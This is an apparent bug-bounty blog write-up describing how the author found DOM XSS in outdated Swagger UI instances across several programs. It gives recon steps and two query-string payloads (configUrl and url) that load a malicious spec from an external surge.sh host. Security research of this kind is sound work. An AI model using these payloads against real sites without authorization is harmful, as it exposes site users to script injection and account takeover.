Found +6 DomXSS at different programs (Hacking Swagger-UI)

2 min readApr 19, 2023

Hi guys! In this article I will talk about How I was able to find +6 DomXSS at public programs at Hackerone, Bugcrowd, and Intigrity.

Most of us while hunting, We came across Swagger Ui library , and we don’t care about it, But the thing that you don’t know many of the Swagger Ui are vulnerable to DomXSS because an outdated library called `DomPurify` (which used for input sanitization).

So….What is Swagger Ui?

Swagger UI is a really common library used to display API specifications in a nice-looking UI used by almost every company.
Swagger-UI allows users to provide a URL for an API specification, such as a YAML or JSON file. To view and render them, you add a query parameter. It would be possible to trigger an XSS attack by loading a malicious specification file and accessing the React function at this point.

Recon Process and how to find subdomains that using Swagger Ui :-

1. Collect as much as you can of subdomains of your targets
2. Scan them and see which are alives.
3. I use my own tool >>> https://github.com/doosec101/swagger_scanner <<< to find Swagger Ui endpoints and with the help with swagger nuclei template was able to discover +100 of my targets using Swagger Ui, But +6 of them was vulnerable to DomXSS.

Time To Exploit:-

Swagger UI versions affected with the XSS: >=3.14.1 < 3.38.0

1. After gets the endpoints of Swagger Ui use these payloads ?configUrl=https://jumpy-floor.surge.sh/test.json , Sometimes the payload won’t work so check this one ?url=https://jumpy-floor.surge.sh/test.yaml

Examples:-

Finally got 3 triaged and one dups again 😆

References:-

This write-up was inspired by https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

Hope you learned something new, And here’s my profile at hackerone:- https://hackerone.com/doosec101